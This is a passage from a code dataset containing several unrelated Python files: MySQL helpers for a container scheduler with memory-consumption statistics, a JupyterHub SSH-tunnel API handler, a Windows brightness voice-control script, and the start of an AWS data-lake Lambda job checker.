mysql.connector.Error as err:\n\t\tlogging.error('Getting Application %s Info on Database Error: %s', appid, err)\n\n\tfinally:\n\t\treturn application\n\n\n# ---------- Request Table Functions ----------\n# Function to create a request on global database\n\n\ndef create_request(request: Request):\n\tquery = \"INSERT INTO request (uid, reqname, num_containers) VALUES (%s, %s, %s)\"\n\tinfo = (request.user, request.name, request.num_containers)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\treqid = item[0]\n\t\t\tlogging.info('Request %s Created on Database', reqid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn reqid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating the Request %s on Database Error: %s', request.name, err)\n\n\n# Function to update a request status\n\n\ndef update_request_status(reqid: int, status: str):\n\tinfo = (status, reqid)\n\n\tif status == 'SCHEDULED':\n\t\tquery = \"UPDATE request SET reqstatus = %s, start_time = CURRENT_TIMESTAMP WHERE reqid = %s\"\n\n\telif status in ['FINISHED','ERROR']:\n\t\tquery = \"UPDATE request SET reqstatus = %s, end_time = CURRENT_TIMESTAMP WHERE reqid = %s\"\n\n\telse:\n\t\tquery = \"UPDATE request SET reqstatus = %s WHERE reqid = %s\"\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tlogging.debug('Request %s Status Updated on Database', reqid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Updating Status from Request %s on Database Error: %s', reqid, err)\n\n\n# Function to get new requests from global database\n\n\ndef get_new_requests():\n\tquery = \"SELECT reqid, uid, reqname, reqstatus, num_containers FROM request WHERE reqstatus = 'NEW' ORDER BY reqid\"\n\treq_list = 
[]\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query)\n\n\t\t\tfor item in cursor:\n\t\t\t\trequest = Request()\n\t\t\t\trequest.reqid = item[0]\n\t\t\t\trequest.user = item[1]\n\t\t\t\trequest.name = item[2]\n\t\t\t\trequest.status = item[3]\n\t\t\t\trequest.num_containers = item[4]\n\t\t\t\tprint('Request: ', vars(request))\n\t\t\t\treq_list.append(request)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Getting New Requests on Database Error: %s', err)\n\n\tfinally:\n\t\tif not req_list:\n\t\t\tlogging.debug('Not find any New Request on Database')\n\t\treturn req_list\n\n\n# ---------- Container Table Functions ----------\n# Function to create a container on global database\n\n\ndef create_container(reqid: int, appid: int, name: str, command: str, est_time: timedelta):\n\tquery = \"INSERT INTO container (rid, aid, containername, command, estimated_time) VALUES (%s, %s, %s, %s, %s)\"\n\tinfo = (reqid, appid, name, command, est_time)\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tquery = \"SELECT LAST_INSERT_ID()\"\n\t\t\tcursor.execute(query)\n\t\t\titem = cursor.fetchone()\n\t\t\tcid = item[0]\n\t\t\tlogging.info('Container %s Created with ID %s on Database', name, cid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\t\t\treturn cid\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Creating Container %s on Database Error: %s', name, err)\n\n\n# Function to update a container status\n\n\ndef update_container_status(container: Container):\n\tquery = \"\"\n\tinfo = ()\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\n\t\t\tif container.state == 'RUNNING':\n\t\t\t\tquery = \"UPDATE container SET status = %s, start_time = %s WHERE containerid = %s\"\n\t\t\t\tinfo = (container.state, container.start_time, container.cid)\n\n\t\t\telif container.state in ['STOPPED','ERROR']:\n\t\t\t\tquery = \"UPDATE container SET status = %s, end_time = CURRENT_TIMESTAMP WHERE containerid = %s\"\n\t\t\t\tinfo = (container.state, container.cid)\n\n\t\t\telse:\n\t\t\t\tquery = \"UPDATE container SET status = %s WHERE containerid = %s\"\n\t\t\t\tinfo = (container.state, container.cid)\n\n\t\t\tcursor.execute(query, info)\n\t\t\tconn.commit()\n\t\t\tlogging.info('Container %s Status Updated on Database', container.cid)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Updating Container %s Status on Database Error: %s', container.cid, err)\n\n\n# Function to get the containers from a particular request\n\n\ndef get_containers_from_request(reqid: int):\n\tquery = \"SELECT c.containerid, c.containername, c.command, c.status, c.estimated_time, a.image, a.min_memory, a.max_memory, a.num_cores, a.apptype \\\n\t\t\tFROM container c, application a WHERE c.rid = %s AND a.appid = c.aid ORDER BY c.containerid\"\n\tinfo = (reqid,)\n\tcontainer_list = []\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = Container()\n\t\t\t\tcontainer.cid = item[0]\n\t\t\t\tcontainer.name = item[1]\n\t\t\t\tcontainer.command = item[2]\n\t\t\t\tcontainer.state = item[3]\n\t\t\t\tcontainer.estimated_time = item[4]\n\t\t\t\tcontainer.template = item[5]\n\t\t\t\tcontainer.min_mem_limit = 
item[6]\n\t\t\t\tcontainer.max_mem_limit = item[7]\n\t\t\t\tcontainer.request_cpus = item[8]\n\t\t\t\tcontainer.apptype = item[9]\n\t\t\t\t#print('Container: ', vars(container))\n\t\t\t\tcontainer_list.append(container)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Getting Containers from Request %s on Database Error: %s', reqid, err)\n\n\tfinally:\n\t\tif not container_list:\n\t\t\tlogging.debug('Not find any Container from Request %s on Database', reqid)\n\t\treturn container_list\n\n\n# Function to get a container stored data from global database\n\n\ndef get_container_history(cid: int):\n\tquery = \"SELECT logdata, time FROM container_history WHERE cid = %s\"\n\tinfo = (cid,)\n\n\ttime_list = []\n\tdata_list = []\n\n\ttry:\n\t\tconn = get_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Database Error: %s', cid, err)\n\n\tfinally:\n\t\tif not data_list and not time_list:\n\t\t\tlogging.info('Not Find any Container History for %s on Database', cid)\n\t\treturn data_list, time_list\n\n\ndef get_local_container_history(name: str):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s\"\n\tinfo = (name,)\n\n\ttime_list = []\n\tdata_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tif not data_list and not time_list:\n\t\t\tlogging.info('Not Find any Container History for %s on Local Database', name)\n\t\treturn data_list, time_list\n\n\ndef get_local_container_history_interval(name, window_length):\n\t#query = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tquery = \"SELECT data, time from container_history WHERE name = %s AND time >= %s ORDER BY time DESC\"\n\tinfo = (name, window_length)\n\n\ttime_list = []\n\tdata_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tif not data_list and not time_list:\n\t\t\tlogging.info('Not Find any Container History for %s on Local Database', name)\n\t\treturn data_list, time_list\n\n\n# Function to remove a container stored data from local database\n\n\ndef delete_local_container_history(name: str):\n\tquery = \"DELETE FROM container_history WHERE name = %s\"\n\tinfo = (name,)\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor()\n\t\t\tcursor.execute(query, 
info)\n\t\t\tconn.commit()\n\t\t\tlogging.info('Container %s History Deleted from Local Database', name)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\n# ---------- Policies Database Functions ----------\n\n\ndef get_container_memory_consumption(name, window_length):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tinfo = (name, window_length)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tprint('Tamanho Datalist = ', len(data_list))\n\t\t\tprint('Wall Time: ',(time_list[0] - time_list[-1]).seconds, ' seconds')\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tdelta = 0\n\t\tswapdelta = 0\n\n\t\tfor index in range(len(data_list) - 1):\n\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\tdelta += data_list[index].getUsedMemory2() - data_list[index + 1].getUsedMemory2()\n\t\t\t\tswapdelta += int(data_list[index].mem_stats['swap']) - int(data_list[index + 1].mem_stats['swap'])\n\n\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\tdelta += data_list[index].getUsedMemory() - data_list[index + 1].getUsedMemory()\n\n\t\tprint('Delta: ' + str(delta // 2 ** 20) + 'MB')\n\t\tprint('Swap Delta: ' + str(swapdelta // 2 ** 20) + 'MB')\n\t\treturn delta, swapdelta\n\n\ndef get_container_memory_consumption2(name, window_length):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tinfo = (name, window_length)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\t#print('Tamanho Datalist = ', len(data_list))\n\t\t\twalltime = (time_list[0] - time_list[-1]).seconds\n\t\t\t#print('Wall Time: ', walltime, ' seconds')\n\t\t\tlogging.info('Container: %s, Datalist Size: %d, Wall Time: %d s', name, len(data_list), walltime)\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tmemory_used = 0\n\t\tswap_used = 0\n\t\tpage_faults = 0\n\t\tmajor_faults = 0\n\n\t\tprint('Container: ', name, ' Init Window: ', time_list[0], ' End Window: ', time_list[-1],\n\t\t\t 'Wall: ', (time_list[0] - time_list[-1]).seconds, flush=True)\n\n\t\tfor index in range(len(data_list) - 1):\n\t\t\tmemory_used += data_list[index].getUsedMemory() - data_list[index + 1].getUsedMemory()\n\t\t\tpage_faults += data_list[index].getMemoryPageFaults() - data_list[index + 1].getMemoryPageFaults()\n\t\t\tmajor_faults += data_list[index].getMemoryMajorFaults() - data_list[index + 1].getMemoryMajorFaults()\n\n\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\tswap_used += int(data_list[index].mem_stats['swap']) - int(data_list[index + 
1].mem_stats['swap'])\n\n\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\tprint('Calcular uso de swap no Docker')\n\n\t\t#print('Delta: ' + str(memory_used // 2 ** 20) + 'MB')\n\t\t#print('Swap Delta: ' + str(swap_used // 2 ** 20) + 'MB')\n\t\t#print('Page Faults: ', page_faults)\n\t\t#print('Major Faults: ', major_faults)\n\t\tlogging.info('Container: %s, MemUsed: %s MB, SwapUsed: %s MB, PgFaults: %d, PgMajorFaults: %d',\n\t\t\t\t\tname, str(memory_used // 2 ** 20), str(swap_used // 2 ** 20), page_faults, major_faults)\n\n\t\treturn {'memory': memory_used, 'swap': swap_used, 'page_faults': page_faults, 'major_faults': major_faults}\n\n\ndef get_container_memory_consumption3(name, last_sched):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s AND time >= %s ORDER BY time DESC\"\n\tinfo = (name, last_sched)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tmemory_used = 0\n\t\tswap_used = 0\n\t\tmajor_faults = 0\n\n\t\t#print('Tamanho Datalist = ', len(data_list)\n\t\twalltime = (time_list[0] - time_list[-1]).seconds\n\t\tlogging.info('Container: %s, Datalist Size: %d, Wall Time: %d s', name, len(data_list), walltime)\n\n\t\tprint('Container: ', name, ' Init Window: ', time_list[0], ' End Window: ', time_list[-1],\n\t\t\t 'Wall: ', (time_list[0] - time_list[-1]).seconds, flush=True)\n\n\t\tfor index in range(len(data_list) - 1):\n\t\t\tmemory_used += (data_list[index].getUsedMemory() - data_list[index + 1].getUsedMemory()) #// (time_list[index] - time_list[index + 1]).seconds\n\t\t\tmajor_faults += data_list[index].getMemoryMajorFaults() - data_list[index + 1].getMemoryMajorFaults()\n\n\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\tswap_used += (int(data_list[index].mem_stats['swap']) - int(data_list[index + 1].mem_stats['swap'])) #// (time_list[index] - time_list[index + 1]).seconds\n\n\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\tprint('Calcular uso de swap no Docker')\n\n\t\tmemory_used = memory_used // walltime\n\t\tswap_used = swap_used // walltime\n\n\t\tlogging.info('Container: %s, MemUsed: %s MB/s, SwapUsed: %s MB/s, PgMajorFaults: %d',\n\t\t\t\t\tname, str(memory_used // 2 ** 20), str(swap_used // 2 ** 20), major_faults)\n\n\t\treturn {'memory': memory_used, 'swap': swap_used, 'major_faults': major_faults}\n\n\ndef get_container_memory_consumption4(name, short_sched, long_sched):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s AND time >= %s ORDER BY time\"\n\tinfo1 = (name, short_sched)\n\tinfo2 = (name, long_sched)\n\n\tdatalist_short = []\n\tdatalist_long = []\n\ttimelist_short = []\n\ttimelist_long = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info1)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdatalist_short.append(container)\n\t\t\t\ttimelist_short.append(time)\n\n\t\t\tcursor.execute(query, info2)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime 
= item[1]\n\t\t\t\tdatalist_long.append(container)\n\t\t\t\ttimelist_long.append(time)\n\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tmemory_used_short = 0\n\t\tmemory_used_long = 0\n\t\tswap_used_short = 0\n\t\tswap_used_long = 0\n\t\tmajor_faults = 0\n\n\t\twalltime_long = (timelist_long[-1] - timelist_long[0]).seconds\n\t\twalltime_short = (timelist_short[-1] - timelist_short[0]).seconds\n\n\t\tmemory_used_short += (datalist_short[-1].getUsedMemory() - datalist_short[0].getUsedMemory()) // walltime_short\n\t\tmemory_used_long += (datalist_long[-1].getUsedMemory() - datalist_long[0].getUsedMemory()) // walltime_long\n\t\tmajor_faults += datalist_long[-1].getMemoryMajorFaults() - datalist_long[0].getMemoryMajorFaults()\n\n\t\tif parser['Container']['type'] == 'LXC':\n\t\t\tswap_used_short += (int(datalist_short[-1].mem_stats['swap']) - int(datalist_short[0].mem_stats['swap'])) // walltime_short\n\t\t\tswap_used_long += (int(datalist_long[-1].mem_stats['swap']) - int(datalist_long[0].mem_stats['swap'])) // walltime_long\n\n\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\tprint('Calcular uso de swap no Docker')\n\n\t\tif(memory_used_long + swap_used_long) <= (memory_used_short + swap_used_short):\n\t\t\tmemory_used = memory_used_short\n\t\t\tswap_used = swap_used_short\n\n\t\telse:\n\t\t\tmemory_used = (memory_used_long + memory_used_short) / 2\n\t\t\tswap_used = (swap_used_long + swap_used_short) / 2\n\n\t\tlogging.info('Container: %s, MemUsed: %s MB/s, SwapUsed: %s MB/s, PgMajorFaults: %d',\n\t\t\t\t\tname, str(memory_used // 2 ** 20), str(swap_used // 2 ** 20), major_faults)\n\n\t\treturn {'memory': memory_used, 'swap': swap_used, 'major_faults': major_faults}\n\n\ndef get_container_memory_consumption_ED(name, window_length):\n\tquery = \"SELECT data, time FROM container_history WHERE name = %s ORDER BY time DESC LIMIT %s\"\n\tinfo = (name, window_length)\n\n\tdata_list = []\n\ttime_list = []\n\n\ttry:\n\t\tconn = get_local_connection()\n\n\t\tif conn:\n\t\t\tcursor = conn.cursor(buffered=True)\n\t\t\tcursor.execute(query, info)\n\n\t\t\tfor item in cursor:\n\t\t\t\tcontainer = dill.loads(item[0])\n\t\t\t\ttime = item[1]\n\t\t\t\tdata_list.append(container)\n\t\t\t\ttime_list.append(time)\n\n\t\t\tprint('Tamanho Datalist = ', len(data_list))\n\t\t\tprint('Wall Time: ',(time_list[0] - time_list[-1]).seconds, ' seconds')\n\t\t\tcursor.close()\n\t\t\tconn.close()\n\n\texcept mysql.connector.Error as err:\n\t\tlogging.error('Get Container %s History on Local Database Error: %s', name, err)\n\n\tfinally:\n\t\tdelta = 0\n\n\t\tfor index in range(len(data_list)):\n\t\t\tif (index % 2) == 0:\n\t\t\t\tif parser['Container']['type'] == 'LXC':\n\t\t\t\t\tdelta += data_list[index].getUsedMemory2()\n\n\t\t\t\telif parser['Container']['type'] == 'DOCKER':\n\t\t\t\t\tdelta += data_list[index].getUsedMemory()\n\n\t\tmedia = delta // (len(data_list) // 2)\n\n\t\tprint('Media: ' + str(media // 2 ** 20) + 'MB')\n\t\treturn media\n","repo_name":"Zilves/elasticcontainer","sub_path":"utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":25369,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"40966484968","text":"import datetime\nimport inspect\nimport json\n\nfrom jupyterhub.apihandlers import default_handlers\nfrom jupyterhub.apihandlers.base import APIHandler\nfrom jupyterhub.scopes import needs_scope\nfrom tornado import web\n\n\nclass SetupTunnelAPIHandler(APIHandler):\n @needs_scope(\"access:servers\")\n async def post(self, user_name, server_name=\"\"):\n self.set_header(\"Cache-Control\", \"no-cache\")\n if server_name is None:\n server_name = \"\"\n user = self.find_user(user_name)\n if user is None:\n # no such user\n raise web.HTTPError(404)\n if server_name not in user.spawners:\n # user has no such server\n raise web.HTTPError(404)\n body = self.request.body.decode(\"utf8\")\n try:\n json_body = json.loads(body) if body else {}\n except:\n self.set_status(400)\n self.log.exception(\n f\"{user_name}:{server_name} - Could not load body into json. Body: {body}\"\n )\n return\n\n user = self.find_user(user_name)\n spawner = user.spawners[server_name]\n\n if spawner._stop_pending:\n self.log.debug(\n f\"{spawner._log_name} - APICall: SetupTunnel - but spawner is already stopping.\",\n extra={\n \"log_name\": spawner._log_name,\n \"user\": user_name,\n \"action\": \"setuptunnel\",\n \"event\": json_body,\n },\n )\n self.set_header(\"Content-Type\", \"text/plain\")\n self.write(\"Bad Request.\")\n self.set_status(400)\n return\n\n if json_body:\n self.log.debug(\n f\"{spawner._log_name} - APICall: SetupTunnel\",\n extra={\n \"log_name\": spawner._log_name,\n \"user\": user_name,\n \"action\": \"setuptunnel\",\n \"event\": json_body,\n },\n )\n try:\n spawner.port_forward_info.update(json_body)\n spawner.orm_spawner.state = spawner.get_state()\n self.db.commit()\n await spawner.run_ssh_forward()\n except Exception as e:\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\")[:-3]\n failed_event = {\n \"progress\": 100,\n \"failed\": True,\n \"html_message\": f\"{now}: Could not setup tunnel {str(e)} \",\n }\n self.log.exception(\n f\"{spawner._log_name} - Could not setup tunnel for {user_name}:{server_name}\",\n extra={\n \"log_name\": spawner._log_name,\n \"user\": user_name,\n \"action\": \"tunnelfailed\",\n \"event\": failed_event,\n },\n )\n stop = spawner.stop(cancel=True, event=failed_event)\n if inspect.isawaitable(stop):\n await stop\n self.set_header(\"Content-Type\", \"text/plain\")\n self.set_status(400)\n return\n else:\n self.set_header(\"Content-Type\", \"text/plain\")\n self.set_status(204)\n return\n else:\n self.set_header(\"Content-Type\", \"text/plain\")\n self.write(\"Bad Request.\")\n self.set_status(400)\n return\n\n\ndefault_handlers.append((r\"/api/users/setuptunnel/([^/]+)\", SetupTunnelAPIHandler))\ndefault_handlers.append(\n (r\"/api/users/setuptunnel/([^/]+)/([^/]+)\", SetupTunnelAPIHandler)\n)\n","repo_name":"kreuzert/jupyterhub-forwardbasespawner","sub_path":"forwardbasespawner/api_setup_tunnel.py","file_name":"api_setup_tunnel.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19198442819","text":"import difflib\r\nimport wmi\r\nimport screen_brightness_control as sbc\r\nimport re\r\n\r\ndef extract_numbers(text):\r\n numbers = re.findall(r'\\d+', text)\r\n return [int(num) for num in numbers]\r\n\r\ndef light_judgement(text, score_line = 0.5):\r\n text = text.lower()\r\n increase_keywords = [\"调高\",\"增大\",\"更亮\",\"太暗了\",\"亮点\",\"brighter\",\"more\",\"too dark\"]\r\n decrease_keywords = [\"调低\",\"减小\",\"更暗\",\"太亮了\",\"暗点\",\"darker\",\"less\",\"too dark\"]\r\n volume_adjustment = [\"亮度调节\", \"亮度到\", \"亮度设置\", \"亮度调整\", \"把亮度\",\"调节为\",\"adjust to\", \"set to\", \"change to\", \"turn to\"]\r\n \r\n for keyword in increase_keywords:\r\n tmp_score = difflib.SequenceMatcher(None, text , keyword).ratio()\r\n print(tmp_score,\"1\")\r\n if tmp_score > score_line:\r\n return -1\r\n for keyword in decrease_keywords:\r\n tmp_score = difflib.SequenceMatcher(None, text , keyword).ratio()\r\n print(tmp_score,\"2\")\r\n if tmp_score > score_line:\r\n return -2\r\n for keyword in volume_adjustment:\r\n tmp_score = difflib.SequenceMatcher(None, text , keyword).ratio()\r\n print(tmp_score,\"3\")\r\n if tmp_score > score_line:\r\n number = extract_numbers(text)\r\n print(\"number=\",number[0])\r\n try:\r\n if 0 <= int(number[0]) <= 100:\r\n return number[0]\r\n except ValueError:\r\n print(\"ERROR:该亮度不存在!\")\r\n pass\r\n return -3\r\n\r\ndef brightness_control(vis):\r\n c = wmi.WMI(namespace='wmi')\r\n methods = c.WmiMonitorBrightnessMethods()[0]\r\n current_brightness = sbc.get_brightness()\r\n present_brightness = current_brightness[0]\r\n print(\"当前亮度\",present_brightness)\r\n \r\n x = light_judgement(vis)\r\n\r\n if x == -1:\r\n if present_brightness <= 80:\r\n methods.WmiSetBrightness(present_brightness + 20,0)\r\n print(\"亮度已调节到\",present_brightness + 20)\r\n else: \r\n methods.WmiSetBrightness(100,0)\r\n print(\"已经最亮了,注意合理用眼!\")\r\n elif x == -2:\r\n if present_brightness >= 20:\r\n methods.WmiSetBrightness(present_brightness - 20 ,0)\r\n print(\"亮度已调节到\",present_brightness - 20)\r\n else: \r\n methods.WmiSetBrightness(0,0)\r\n print(\"看不见了!\")\r\n elif x == -3:\r\n return\r\n else:\r\n methods.WmiSetBrightness(x,0)\r\n print(\"亮度已调节到\",x)","repo_name":"panbu2007/voice-assistant-for-win","sub_path":"light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"578391877","text":"from datalake_library.commons import init_logger\nfrom datalake_library.transforms.transform_handler import TransformHandler\nfrom datalake_library import octagon\nfrom datalake_library.octagon import Artifact, EventReasonEnum, peh\nfrom datalake_library.configuration.resource_configs import DynamoConfiguration, S3Configuration\nfrom datalake_library.interfaces.dynamo_interface import DynamoInterface\nfrom datalake_library.interfaces.s3_interface import S3Interface\n\nlogger = init_logger(__name__)\n\n\ndef get_manifest_data(bucket, team, dataset, manifest_key):\n \"\"\" Returns a list of items from manifests control table \"\"\"\n dynamo_config = DynamoConfiguration()\n dynamo_interface = DynamoInterface(dynamo_config)\n s3_interface = S3Interface()\n local_path = s3_interface.download_object(bucket, manifest_key)\n ddb_keys = []\n items = []\n with open(local_path, \"r\") as raw_file:\n file_names = [file_name.strip().split(\"/\")[-1]\n for file_name in raw_file]\n for file in file_names:\n ddb_keys.append({\n \"dataset_name\": team+\"-\"+dataset,\n \"manifest_file_name\": manifest_key.split(\"/\")[-1], \"datafile_name\": file\n })\n for ddb_key in ddb_keys:\n try:\n items.append(dynamo_interface.get_item_from_manifests_control_table(\n ddb_key[\"dataset_name\"], ddb_key[\"manifest_file_name\"], ddb_key[\"datafile_name\"]))\n except KeyError:\n logger.error(\"The manifest file has not been processed in Stage A\")\n raise Exception(\"Manifest File has not been processed in Stage A\")\n\n return items\n\n\ndef get_ddb_keys(items):\n ddb_keys = []\n for item in items:\n ddb_key = {'dataset_name': item['dataset_name'],\n 'datafile_name': item['datafile_name']}\n ddb_keys.append(ddb_key)\n return ddb_keys\n\ndef lambda_handler(event, context):\n \"\"\"Calls custom job waiter developed by user\n\n Arguments:\n event {dict} -- Dictionary with details on previous processing step\n context {dict} -- Dictionary with details on Lambda context\n\n Returns:\n {dict} -- Dictionary with Processed Bucket, Key(s) and Job Details\n \"\"\"\n try:\n logger.info('Fetching event data from previous step')\n bucket = event['body']['bucket']\n keys_to_process = event['body']['keysToProcess']\n team = event['body']['team']\n stage = event['body']['pipeline_stage']\n dataset = event['body']['dataset']\n job_details = event['body']['job']['jobDetails']\n processed_keys_path = event['body']['job']['processedKeysPath']\n\n logger.info('Initializing Octagon client')\n component = context.function_name.split('-')[-2].title()\n octagon_client = (\n octagon.OctagonClient()\n .with_run_lambda(True)\n .with_configuration_instance(event['body']['env'])\n .build()\n )\n logger.info('Querying manifests control table ')\n\n items = get_manifest_data(bucket, team, dataset, keys_to_process[0])\n\n ddb_keys = get_ddb_keys(items)\n\n dynamo_config = DynamoConfiguration()\n dynamo_interface = DynamoInterface(dynamo_config)\n \n\n logger.info('Checking Job Status with user custom code')\n transform_handler = TransformHandler().stage_transform(team, dataset, stage)\n response = transform_handler().check_job_status(bucket, keys_to_process,\n processed_keys_path, job_details) # custom user code called\n response['peh_id'] = event['body']['job']['peh_id']\n\n if event['body']['job']['jobDetails']['jobStatus'] == 'FAILED':\n peh.PipelineExecutionHistoryAPI(\n octagon_client).retrieve_pipeline_execution(response['peh_id'])\n octagon_client.end_pipeline_execution_failed(component=component,\n 
